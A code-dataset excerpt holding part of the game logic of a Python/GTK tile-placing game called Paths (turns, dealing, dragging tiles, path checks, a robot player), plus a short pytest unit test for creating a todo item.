1:\n self.hands.append(Hand(self.tile_width, self.tile_height,\n remote=True))\n self.hands[ROBOT_HAND].deal(self.deck)\n # ...or deal hands to the joiners.\n elif len(self.buddies) > 1:\n for i, buddy in enumerate(self.buddies):\n if buddy != self._activity.nick:\n self.hands.append(Hand(\n self.tile_width, self.tile_height, remote=True))\n self.hands[i].deal(self.deck)\n self._activity.send_event(\"h\",\n self.hands[i].serialize(buddy=buddy))\n\n # As initiator, you take the first turn.\n self.its_my_turn()\n\n # If we are joining, we need to wait for a hand.\n else:\n self._my_hand = self.buddies.index(self._activity.nick)\n self.its_their_turn(self.buddies[1]) # Sharer will be buddy 1\n\n def we_are_sharing(self):\n ''' If we are sharing, there is more than one buddy. '''\n if len(self.buddies) > 1:\n return True\n\n def _set_label(self, string):\n ''' Set the label in the toolbar or the window frame. 
'''\n if self._running_sugar:\n self._activity.status.set_label(string)\n self._activity.score.set_label(_('Score: ') + str(self.score))\n elif hasattr(self, 'win'):\n self.win.set_title('%s: %s [%d]' % (_('Paths'), string,\n self.score))\n\n def its_my_turn(self):\n # I need to play a piece...\n self.placed_a_tile = False\n # and I am no longer waiting for my turn.\n self._waiting_for_my_turn = False\n # If I don't have any tiles left, time to redeal.\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self._redeal()\n if self._running_sugar:\n self._activity.set_player_on_toolbar(self._activity.nick)\n self._activity.dialog_button.set_icon_name('go-next')\n self._activity.dialog_button.set_tooltip(\n _('Click after taking your turn.'))\n self._set_label(_('It is your turn.'))\n\n def _redeal(self):\n # Only the sharer deals tiles.\n if not self.we_are_sharing():\n self.hands[self._my_hand].deal(self.deck)\n if self.playing_with_robot:\n self.hands[ROBOT_HAND].deal(self.deck)\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n if self._running_sugar:\n self._activity.dialog_button.set_icon_name(\n 'media-playback-stop-insensitive')\n self._activity.dialog_button.set_tooltip(_('Game over'))\n self.game_over()\n elif self._initiating():\n if self.deck.empty():\n self.game_over()\n return\n if self.deck.tiles_remaining() < COL * len(self.buddies):\n number_of_tiles_to_deal = \\\n int(self.deck.tiles_remaining() / len(self.buddies))\n if number_of_tiles_to_deal == 0:\n number_of_tiles_to_deal = 1 # Deal last tile in deck.\n else:\n number_of_tiles_to_deal = COL\n for i, nick in enumerate(self.buddies):\n self.hands[i].deal(self.deck, number_of_tiles_to_deal)\n # Send the joiners their new hands.\n if nick != self._activity.nick:\n self._activity.send_event(\"h\",\n (self.hands[i].serialize(buddy=nick)))\n\n def took_my_turn(self):\n # Did I complete my turn without any errors?\n if self._there_are_errors:\n self._set_label(_('There are errors—it is still your turn.'))\n return\n\n # After the tile is placed, expand regions of playable grid squares.\n self.show_connected_tiles()\n\n # Are there any completed paths?\n self._test_for_complete_paths(self._last_grid_played)\n\n # If so, let everyone know what piece I moved.\n if self.we_are_sharing():\n self._activity.send_event(\"p\", json_dump([self._last_tile_played,\n self._last_tile_orientation,\n self._last_grid_played]))\n\n self._last_tile_orientation = 0 # Reset orientation.\n # I took my turn, so I am waiting again.\n self._waiting_for_my_turn = True\n if self.last_spr_moved is not None:\n self.last_spr_moved.set_layer(TILES)\n self.last_spr_moved = None\n self._hide_highlight()\n self._set_label(_('You took your turn.'))\n\n if self.playing_with_robot:\n self.its_their_turn(_('robot'))\n self._waiting_for_robot = True\n GObject.timeout_add(1000, self._robot_turn)\n elif not self.we_are_sharing():\n if self.deck.empty() and \\\n self.hands[self._my_hand].tiles_in_hand() == 0:\n self.game_over()\n else:\n self.its_my_turn()\n elif self._initiating():\n self.whos_turn += 1\n if self.whos_turn == len(self.buddies):\n self.whos_turn = 0\n else:\n self.its_their_turn(self.buddies[self.whos_turn])\n self._activity.send_event(\"t\", self.buddies[self.whos_turn])\n\n def _robot_turn(self):\n self._robot_play()\n self.show_connected_tiles()\n if not self._waiting_for_robot:\n self.its_my_turn()\n\n def its_their_turn(self, nick):\n # It is someone else's turn.\n if self._running_sugar:\n if not self.playing_with_robot:\n 
self._activity.set_player_on_toolbar(nick)\n self._activity.dialog_button.set_icon_name('media-playback-stop')\n self._activity.dialog_button.set_tooltip(_('Wait your turn.'))\n self._set_label(_('Waiting for') + ' ' + nick)\n self._waiting_for_my_turn = True # I am still waiting.\n\n def _button_press_cb(self, win, event):\n win.grab_focus()\n x, y = map(int, event.get_coords())\n\n self._dragpos = [x, y]\n self._total_drag = [0, 0]\n\n spr = self._sprites.find_sprite((x, y))\n\n # If it is not my turn, do nothing.\n if self._waiting_for_my_turn:\n self._press = None\n return\n\n self._release = None\n\n # Ignore clicks on background except to indicate you took your turn\n if spr is None or spr in self.grid.blanks or spr == self.deck.board:\n if self.placed_a_tile and spr is None:\n self.took_my_turn()\n self._press = None\n return True\n\n # Are we clicking on a tile in the hand?\n if self.hands[self._my_hand].spr_to_hand(spr) is not None and \\\n not self._there_are_errors:\n self.last_spr_moved = spr\n clicked_in_hand = True\n if self.placed_a_tile:\n self._press = None\n self.took_my_turn()\n else:\n clicked_in_hand = False\n\n # We cannot switch to an old tile.\n if spr == self.last_spr_moved:\n self._press = spr\n\n spr.set_layer(TOP)\n self._show_highlight()\n return True\n\n def _mouse_move_cb(self, win, event):\n \"\"\" Drag a tile with the mouse. \"\"\"\n spr = self._press\n if spr is None:\n self._dragpos = [0, 0]\n return True\n win.grab_focus()\n x, y = map(int, event.get_coords())\n dx = x - self._dragpos[0]\n dy = y - self._dragpos[1]\n spr.move_relative([dx, dy])\n self._move_relative_highlight([dx, dy])\n self._dragpos = [x, y]\n self._total_drag[0] += dx\n self._total_drag[1] += dy\n\n def _button_release_cb(self, win, event):\n win.grab_focus()\n\n self._dragpos = [0, 0]\n\n if self._waiting_for_my_turn:\n return\n\n if self._press is None:\n return\n\n x, y = map(int, event.get_coords())\n spr = self._sprites.find_sprite((x, y))\n self._release = spr\n grid_pos = self.grid.xy_to_grid(x, y)\n hand_pos = self.hands[self._my_hand].xy_to_hand(x, y)\n\n # Placing tile in grid\n if grid_pos is not None and self._it_is_a_drag() and \\\n self.grid.blanks[grid_pos].get_layer() > HIDE:\n\n # Moving to an empty grid position\n if self.grid.grid[grid_pos] is None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n # If the tile was previously in the grid, empty its old pos.\n i = self.grid.spr_to_grid(self._press)\n if i is not None:\n self.grid.grid[i] = None\n\n # Assign the tile to the new grid position.\n self.grid.grid[grid_pos] = tile\n self.placed_a_tile = True\n self._last_tile_played = tile.number\n self._last_grid_played = grid_pos\n\n # If the tile came from the hand, empty its old position.\n i = self.hands[self._my_hand].spr_to_hand(self._press)\n if i is not None:\n self.hands[self._my_hand].hand[i] = None\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n\n self._show_highlight()\n # Returning tile to hand\n elif hand_pos is not None:\n # Make sure there is somewhere to place the tile.\n empty = self.hands[self._my_hand].find_empty_slot()\n if empty is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.hands[self._my_hand].hand_to_xy(empty))\n # Did the tile come from elsewhere in the hand?\n if self.hands[self._my_hand].spr_to_hand(\n self._press) is not None:\n self.hands[self._my_hand].hand[self.hands[\n 
self._my_hand].spr_to_hand(self._press)] = None\n # or from the grid?\n elif self.grid.spr_to_grid(self._press) is not None:\n self.grid.grid[self.grid.spr_to_grid(self._press)] = None\n self.hands[self._my_hand].hand[empty] = tile\n\n # Remember which tile moved.\n if spr == self.last_spr_moved:\n self.last_spr_moved = None\n\n self._hide_errormsgs()\n self._there_are_errors = False\n else: # Or return tile to the grid\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n\n self._hide_highlight()\n self._press = None\n self._release = None\n self.placed_a_tile = False\n return True\n # Rotate\n elif self._press == self._release and not self._it_is_a_drag():\n tile = self.deck.spr_to_tile(spr)\n tile.rotate_clockwise()\n self._last_tile_orientation = tile.orientation\n\n # Remember which tile moved.\n if self.last_spr_moved != tile.spr:\n self.last_spr_moved = tile.spr\n self._show_highlight()\n\n # In limbo: return to grid\n if hand_pos is None and x < self.grid.left:\n grid_pos = self.grid.spr_to_grid(self._press)\n if grid_pos is not None:\n tile = self.deck.spr_to_tile(self._press)\n tile.spr.move(self.grid.grid_to_xy(grid_pos))\n self._hide_highlight()\n\n self._snap_to_grid(self._release)\n self._test_for_bad_paths(self.grid.spr_to_grid(self._press))\n self._press = None\n self._release = None\n return True\n\n def _snap_to_grid(self, spr):\n ''' make sure a tile is aligned in its grid position '''\n for i in range(COL * ROW):\n if self.grid.grid[i] is not None:\n self.grid.grid[i].spr.move(self.grid.grid_to_xy(i))\n if self.grid.grid[i].spr == spr:\n self._move_highlight(self.grid.grid_to_xy(i))\n\n def _it_is_a_drag(self):\n ''' The movement was large enough to be considered a drag as opposed\n to a tile rotate. '''\n if self._total_drag[0] * self._total_drag[0] + \\\n self._total_drag[1] * self._total_drag[1] > \\\n self.tile_width * self.tile_height:\n return True\n return False\n\n def _shuffle_up(self, hand):\n ''' Shuffle all the tiles in a hand to the top. '''\n for i, tile in enumerate(self.hands[hand].hand):\n empty = self.hands[hand].find_empty_slot()\n if i > 0 and tile is not None and empty is not None:\n tile.spr.move(self.hands[hand].hand_to_xy(empty))\n self.hands[hand].hand[empty] = tile\n self.hands[hand].hand[i] = None\n\n def game_over(self, msg=_('Game over')):\n ''' Nothing left to do except show the results. 
'''\n self._set_label(msg)\n self.saw_game_over = True\n if self.hands[self._my_hand].tiles_in_hand() == 0:\n self.score += 50 # Bonus points\n else:\n for tile in self.hands[self._my_hand].hand:\n if tile is not None:\n self.score -= 2 * tile.get_value() # Penalty\n self._shuffle_up(self._my_hand)\n if self._running_sugar:\n self._activity.score.set_label(_('Score: ') + str(self.score))\n self._score_card.set_label(str(self.score))\n self._score_card.set_layer(OVER_THE_TOP)\n self._score_card.move((int(self.tile_width / 2),\n int(self._height / 2) + 2 * self.tile_height))\n if self.playing_with_robot:\n self._shuffle_up(ROBOT_HAND)\n for tile in range(COL):\n if self.hands[ROBOT_HAND].hand[tile] is not None:\n x, y = self.hands[ROBOT_HAND].hand_to_xy(tile)\n self.hands[ROBOT_HAND].hand[tile].spr.move(\n (self.grid.left_hand + self.grid.xinc, y))\n if self._running_sugar:\n self._activity.set_robot_status(False, 'robot-off')\n elif self.we_are_sharing():\n self._activity.send_event(\"g\", \" \")\n\n def show_connected_tiles(self):\n ''' Highlight the squares that surround the tiles already on the grid.\n '''\n for i in range(ROW * COL):\n if self._connected(i):\n self.grid.blanks[i].set_layer(GRID)\n else:\n self.grid.blanks[i].set_layer(HIDE)\n\n def _connected(self, tile):\n ''' Does tile abut the path? '''\n if self.grid.grid.count(None) == ROW * COL:\n return True\n if self.grid.grid[tile] is not None: # already has a tile\n return False\n # Looking north\n if tile >= COL and self.grid.grid[tile + OFFSETS[0]] is not None:\n return True\n # Looking east\n if tile % ROW < ROW - 1 and \\\n self.grid.grid[tile + OFFSETS[1]] is not None:\n return True\n # Looking south\n if tile < (ROW - 1) * COL and \\\n self.grid.grid[tile + OFFSETS[2]] is not None:\n return True\n # Looking west\n if tile % ROW > 0 and self.grid.grid[tile + OFFSETS[3]] is not None:\n return True\n return False\n\n def give_a_hint(self):\n ''' Try to find an open place on the grid for any tile in my_hand. '''\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[self._my_hand].hand:\n if self._try_placement(tile, order[i]):\n # Success, so give hint.\n self.grid.grid[order[i]] = None\n self._show_highlight(\n pos=self.grid.grid_to_xy(order[i]))\n return\n # Nowhere to play.\n self.game_over(_('Nowhere to play.'))\n\n def _robot_play(self):\n ''' The robot tries random tiles in random locations. '''\n # TODO: strategy: try to complete paths\n order = self.deck.random_order(ROW * COL)\n for i in range(ROW * COL):\n if self._connected(order[i]):\n for tile in self.hands[ROBOT_HAND].hand:\n if self._try_placement(tile, order[i]):\n # Success, so remove tile from hand.\n self.hands[ROBOT_HAND].hand[\n self.hands[ROBOT_HAND].hand.index(tile)] = None\n tile.spr.move(self.grid.grid_to_xy(order[i]))\n tile.spr.set_layer(TILES)\n self._waiting_for_robot = False\n return\n\n # If we didn't return above, we were unable to play a tile.\n self.game_over(_('Robot unable to play'))\n\n def _try_placement(self, tile, i):\n ''' Try to place a tile at grid position i. Rotate it, if necessary. '''\n if tile is None:\n return False\n self.grid.grid[i] = tile\n for j in range(4):\n self._test_for_bad_paths(i)\n if not self._there_are_errors:\n return True\n tile.rotate_clockwise()\n self.grid.grid[i] = None\n return False\n\n def _test_for_complete_paths(self, tile):\n ''' Did this tile complete a path? (or two paths?) 
'''\n\n # A tile can complete up to two paths.\n self._paths = [[], []]\n break_in_path = [False, False]\n\n # Seed the paths and lists with the current tile.\n if tile is not None:\n self._add_to_path_list(tile, 0, 0)\n if len(self.grid.grid[tile].paths) == 2:\n self._add_to_path_list(tile, 1, 1)\n\n # Walk the path.\n for p in range(2):\n tile, path = self._tile_to_test(p)\n while tile is not None:\n self._test(tile, path, p, self._test_a_neighbor)\n self._tile_has_been_tested(tile, path, p)\n tile, path = self._tile_to_test(p)\n # Is the path complete?\n for i in self._paths[p]:\n if not self._test(i[0], i[1], None, self._test_a_connection):\n break_in_path[p] = True\n if not break_in_path[p] and len(self._paths[p]) > 0:\n for i in self._paths[p]:\n self.grid.grid[i[0]].set_shape(i[1])\n self.score += self.grid.grid[i[0]].get_value()\n\n def _tile_to_test(self, test_path):\n ''' Find a tile that needs testing. '''\n for i in self._paths[test_path]:\n if i[2] is False:\n return i[0], i[1]\n return None, None\n\n def _add_to_path_list(self, tile, tile_path, test_path):\n ''' Only add a tile to the path if it is not already there. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n return\n self._paths[test_path].append([tile, tile_path, False])\n\n def _tile_has_been_tested(self, tile, tile_path, test_path):\n ''' Mark a tile as tested. '''\n for i in self._paths[test_path]:\n if i[0] == tile and i[1] == tile_path:\n i[2] = True\n return\n\n def _test(self, tile, tile_path, test_path, test):\n ''' Test each neighbor of a block for a connecting path. '''\n if tile is None:\n return False\n for i in range(4):\n if not test(tile, tile_path, test_path, i, tile + OFFSETS[i]):\n return False\n return True\n\n def _test_a_connection(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Is there a break in the connection? If so return False. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is None:\n return False\n # Which of the neighbor's paths are we connecting to?\n if len(self.grid.grid[neighbor].paths) == 1:\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0:\n return False\n else:\n return True\n if self.grid.grid[neighbor].paths[0][(direction + 2) % 4] == 0 and\\\n self.grid.grid[neighbor].paths[1][(direction + 2) % 4] == 0:\n return False\n return True\n\n def _test_a_neighbor(self, tile, tile_path, test_path, direction,\n neighbor):\n ''' Are we connected to a neighbor's path? If so, add the neighbor\n to our paths list and to the list of tiles that need to be tested. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is not None:\n if neighbor not in self._paths[test_path]:\n # Which of the neighbor's paths are we connecting to?\n if self.grid.grid[neighbor].paths[0][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 0, test_path)\n elif len(self.grid.grid[neighbor].paths) == 2 and \\\n self.grid.grid[neighbor].paths[1][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 1, test_path)\n return True\n\n def _test_for_bad_paths(self, tile):\n ''' Is there a path to nowhere? 
'''\n self._hide_errormsgs()\n self._there_are_errors = False\n if tile is not None:\n self._check_tile(tile, [int(tile / COL), 0], NORTH,\n tile + OFFSETS[0])\n self._check_tile(tile, [tile % ROW, ROW - 1], EAST,\n tile + OFFSETS[1])\n self._check_tile(tile, [int(tile / COL), COL - 1], SOUTH,\n tile + OFFSETS[2])\n self._check_tile(tile, [tile % ROW, 0], WEST, tile + OFFSETS[3])\n\n def _check_tile(self, i, edge_check, direction, neighbor):\n ''' Can a tile be placed at position i? '''\n if edge_check[0] == edge_check[1]:\n for path in self.grid.grid[i].paths:\n if path[direction] == 1:\n self._display_errormsg(i, direction)\n else:\n if self.grid.grid[neighbor] is not None:\n my_path = 0\n your_path = 0\n for c in self.grid.grid[i].paths:\n if c[direction] == 1:\n my_path = 1\n for c in self.grid.grid[neighbor].paths:\n if c[(direction + 2) % 4] == 1:\n your_path = 1\n if my_path != your_path:\n self._display_errormsg(i, direction)\n\n def _display_errormsg(self, i, direction):\n ''' Display an error message where and when appropriate. '''\n if self._press is not None:\n dxdy = [[0.375, -0.125], [0.875, 0.375], [0.375, 0.875],\n [-0.125, 0.375]]\n x, y = self._press.get_xy()\n self._errormsg[direction].move(\n (x + dxdy[direction][0] * self.tile_width,\n y + dxdy[direction][1] * self.tile_height))\n self._errormsg[direction].set_layer(OVER_THE_TOP)\n self._there_are_errors = True\n\n def _hide_errormsgs(self):\n ''' Hide all the error messages. '''\n for i in range(4):\n self._errormsg[i].move((self.grid.left, self.grid.top))\n self._errormsg[i].set_layer(HIDE)\n\n def _hide_highlight(self):\n ''' No tile is selected. '''\n for i in range(4):\n self._highlight[i].move((self.grid.left, self.grid.top))\n self._highlight[i].set_layer(HIDE)\n\n def _move_relative_highlight(self, pos):\n for i in range(4):\n self._highlight[i].move_relative(pos)\n\n def _move_highlight(self, pos):\n x, y = pos\n self._highlight[0].move((x, y))\n self._highlight[1].move((x + 7 * self.tile_width / 8, y))\n self._highlight[2].move((x + 7 * self.tile_width / 8,\n y + 7 * self.tile_height / 8))\n self._highlight[3].move((x, y + 7 * self.tile_height / 8))\n\n def _show_highlight(self, pos=None):\n ''' Highlight the tile that is selected. 
'''\n if self.last_spr_moved is None and pos is None:\n self._hide_highlight()\n else:\n if pos is None:\n x, y = self.last_spr_moved.get_xy()\n else: # Giving a hint.\n x, y = pos\n self._move_highlight((x, y))\n for i in range(4):\n self._highlight[i].set_layer(OVER_THE_TOP)\n\n def _keypress_cb(self, area, event):\n return True\n\n def _draw_cb(self, win, context):\n ''' Callback to handle window expose events '''\n self.do_draw(context)\n return True\n\n def do_draw(self, cr):\n ''' Handle the expose-event by drawing '''\n # Restrict Cairo to the exposed area\n alloc = self._canvas.get_allocation()\n\n cr.rectangle(alloc.x, alloc.y, alloc.width, alloc.height)\n cr.clip()\n # Refresh sprite list\n self._sprites.redraw_sprites(cr=cr)\n\n def _destroy_cb(self, win, event):\n Gtk.main_quit()\n\n", "repo_name": "sugarlabs/paths", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 30963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "sugar3.graphics.style.GRID_CELL_SIZE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sugar3.graphics.style", "line_number": 7, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.width", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.height", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 54, "usage_type": "name"}, {"api_name": "constants.TILE_WIDTH", "line_number": 55, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 56, "usage_type": "name"}, {"api_name": "sprites.Sprites", "line_number": 59, "usage_type": "call"}, {"api_name": "grid.Grid", "line_number": 60, "usage_type": "call"}, {"api_name": "deck.Deck", "line_number": 63, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 66, "usage_type": "call"}, {"api_name": "tile.error_graphic", "line_number": 69, "usage_type": "call"}, {"api_name": "tile.highlight_graphic", "line_number": 70, "usage_type": "call"}, {"api_name": "tile.blank_tile", "line_number": 71, "usage_type": "call"}, {"api_name": "hand.clear", "line_number": 91, "usage_type": "call"}, {"api_name": "constants.HIDE", "line_number": 110, "usage_type": "argument"}, {"api_name": "hand.Hand", "line_number": 142, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 149, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 172, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 174, 
"usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 189, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 190, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 202, "usage_type": "call"}, {"api_name": "constants.COL", "line_number": 208, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 214, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.json_dump", "line_number": 236, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 244, "usage_type": "argument"}, {"api_name": "gettext.gettext", "line_number": 247, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 250, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 279, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 280, "usage_type": "call"}, {"api_name": "constants.TOP", "line_number": 321, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 360, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 365, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tile.number", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 384, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 393, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 414, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 414, "usage_type": "attribute"}, {"api_name": "tile.rotate_clockwise", "line_number": 424, "usage_type": "call"}, {"api_name": "tile.orientation", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 437, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 437, "usage_type": "attribute"}, {"api_name": "constants.COL", "line_number": 448, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 448, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 468, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 468, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 472, "usage_type": "call"}, {"api_name": "tile.get_value", "line_number": 481, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 484, "usage_type": "call"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 486, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 491, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.GRID", "line_number": 506, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 508, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 517, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 520, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 524, "usage_type": "name"}, {"api_name": 
"constants.COL", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 528, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 535, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 535, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 545, "usage_type": "call"}, {"api_name": "constants.ROW", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 551, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 551, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 558, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tile.spr.set_layer", "line_number": 559, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 559, "usage_type": "argument"}, {"api_name": "tile.spr", "line_number": 559, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 564, "usage_type": "call"}, {"api_name": "tile.rotate_clockwise", "line_number": 575, "usage_type": "call"}, {"api_name": "constants.NORTH", "line_number": 677, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 677, "usage_type": "name"}, {"api_name": "constants.EAST", "line_number": 679, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 679, "usage_type": "name"}, {"api_name": "constants.SOUTH", "line_number": 681, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 681, "usage_type": "name"}, {"api_name": "constants.WEST", "line_number": 683, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 683, "usage_type": "name"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 713, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 720, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 726, "usage_type": "argument"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 751, "usage_type": "argument"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 772, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 772, "usage_type": "name"}]}
+{"seq_id": "16147226662", "text": "import pytest\nfrom unittest import mock\nimport uuid\n\nfrom src.application.todo.CreateTodo import CreateTodo\nfrom src.domain.user.errors import UserNotFoundError\n\n\n@pytest.fixture\ndef todo():\n return {\n 'uid': 'test',\n 'content': 'test content'\n }\n\n\ndef test_create_todo(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n id = str(uuid.uuid4())\n repo.generate_id.return_value = id\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n result = create_todo(inputs)\n repo.persist.assert_called_once_with({\n 'uid': todo['uid'],\n 'content': todo['content'],\n 'id': id\n })\n repo.generate_id.assert_called_once()\n user_repo.exists.assert_called_once()\n user_repo.add_todo.assert_called_once_with(todo['uid'], id)\n assert result.content == todo['content']\n assert result.id == id\n\n\ndef test_should_fail_if_user_does_not_exist(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n user_repo.exists.return_value = False\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n with pytest.raises(UserNotFoundError):\n create_todo(inputs)\n", "repo_name": "juansensio/architecture", "sub_path": "src/tests/unit/test_create_todo.py", "file_name": "test_create_todo.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 19, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 22, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 23, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 38, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 39, "usage_type": "name"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 41, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 42, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 43, "usage_type": "call"}, {"api_name": "src.domain.user.errors.UserNotFoundError", "line_number": 43, "usage_type": "argument"}]}
